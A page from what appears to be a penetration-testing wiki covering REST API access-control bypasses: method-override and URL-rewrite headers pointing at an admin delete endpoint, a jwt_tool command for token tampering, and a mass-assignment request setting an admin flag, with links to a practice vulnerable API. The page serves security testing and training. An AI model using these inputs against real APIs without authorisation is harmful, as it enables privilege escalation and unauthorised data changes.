❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • Microsoft Azure
  • REST API - Bypasses and Privilege Escalations
  • Web Pentesting
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Token
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Methodology
  • Bypassing API filter and ACL by rewriting HTTP methods an URLs
  • Access Admin Interface
  • JWT Access Token Tampering
  • Mass Assignment
  • Vulnerable API Project to practice with

Was this helpful?

REST API - Bypasses and Privilege Escalations

REST API security testing

Methodology

https://portswigger.net/web-security/api-testing

Bypassing API filter and ACL by rewriting HTTP methods an URLs

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method: PATCH
X-HTTP-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser

Access Admin Interface

using HTTP headers rewriting trusted client's IP address or Hosts.

JWT Access Token Tampering

JWT Editor : Burp plugin

Available in BApp store, explore also advanced JWT header attacks https://portswigger.net/web-security/jwt#jwt-header-parameter-injections

JWT Tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

python3 ./jwt_tool.py -M pb -t http:/URL:5001/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

Mass Assignment

Observer object properties and try to set them (search for hidden parameters PARAMMINER)

POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true}

Vulnerable API Project to practice with

PreviousMicrosoft AzureNextLDAP Injection

Last updated 2 days ago

Was this helpful?

LogoGitHub - PortSwigger/jwt-editor: A Burp Suite extension and standalone application for creating and editing JSON Web Tokens. This tool supports signing and verification of JWS, encryption and decryption of JWE and automation of several well-known attacks against applications that consume JWT.GitHub
LogoGitHub - theowni/Damn-Vulnerable-RESTaurant-API-Game: Damn Vulnerable Restaurant is an intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.GitHub